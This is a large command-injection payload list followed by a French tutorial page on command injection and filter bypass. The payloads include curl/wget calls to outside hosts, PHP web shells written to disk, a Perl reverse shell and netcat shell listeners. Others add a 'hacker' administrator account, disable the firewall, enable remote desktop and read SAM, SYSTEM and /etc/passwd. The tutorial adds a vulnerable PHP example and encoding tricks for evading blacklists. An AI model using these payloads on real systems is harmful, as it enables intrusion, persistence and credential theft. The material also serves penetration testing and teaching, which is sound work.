curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
;${@print(md5(RCEVulnerable))};
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
pwd
| pwd
; pwd
& pwd
&& pwd
\r
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
\r\n
route
| sleep 1
; sleep 1
& sleep 1
&& sleep 1
sleep 1
|| sleep 10
| sleep 10
; sleep 10
{${sleep(10)}}
& sleep 10
&& sleep 10
sleep 10
|| sleep 15
| sleep 15
; sleep 15
& sleep 15
&& sleep 15
{${sleep(20)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(3)}}
| sleep 5
; sleep 5
& sleep 5
&& sleep 5
sleep 5
{${sleep(hexdec(dechex(20)))}}
{${sleep(hexdec(dechex(20)))}}
sysinfo
| sysinfo
; sysinfo
& sysinfo
&& sysinfo
system('cat C:\boot.ini');
system('cat config.php');
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
systeminfo
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
system('ls')
system('pwd')
system('pwd');
|| system('sleep 5');
| system('sleep 5');
; system('sleep 5');
& system('sleep 5');
&& system('sleep 5');
system('sleep 5')
system('sleep 5');
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
system('whoami')
system('whoami');
test*; ls -lhtR /var/www/
test* || perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test*; perl -e 'print "X"x16096'
$(`type C:\boot.ini`)
&&type C:\\boot.ini
| type C:\Windows\repair\SAM
; type C:\Windows\repair\SAM
& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SAM
type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
; type C:\Windows\repair\SYSTEM
& type C:\Windows\repair\SYSTEM
&& type C:\Windows\repair\SYSTEM
type C:\Windows\repair\SYSTEM
| type C:\WINNT\repair\SAM
; type C:\WINNT\repair\SAM
& type C:\WINNT\repair\SAM
&& type C:\WINNT\repair\SAM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
| type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
; type %SYSTEMROOT%\repair\SYSTEM
& type %SYSTEMROOT%\repair\SYSTEM
&& type %SYSTEMROOT%\repair\SYSTEM
type %SYSTEMROOT%\repair\SYSTEM
uname
;uname;
| uname -a
; uname -a
& uname -a
&& uname -a
uname -a
|/usr/bin/id
;|/usr/bin/id|
;/usr/bin/id|
$;/usr/bin/id
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");'
() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11
| wget http://crowdshield.com/.testing/rce.txt
& wget http://crowdshield.com/.testing/rce.txt
; wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)
&& wget https://crowdshield.com/.testing/rce_vuln.txt
wget https://crowdshield.com/.testing/rce_vuln.txt
$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
whoami
| whoami
; whoami
' whoami
' || whoami
' & whoami
' && whoami
'; whoami
" whoami
" || whoami
" | whoami
" & whoami
" && whoami
"; whoami
$(`whoami`)
& whoami
&& whoami
{{ get_user_file("C:\boot.ini") }}
{{ get_user_file("/etc/hosts") }}
{{4+4}}
{{4+8}}
{{person.secret}}
{{person.name}}
{1} + {1}
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}

== Références ==
*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
*https://github.com/payloadbox/command-injection-payload-list
*https://book.hacktricks.xyz/pentesting-web/command-injection

Web:Injection de Commandes

2023-12-02T18:52:21Z

OldNeib : /* Unix */

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

==== ${SHELLOPTS} ====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== DATA Exfiltration ===
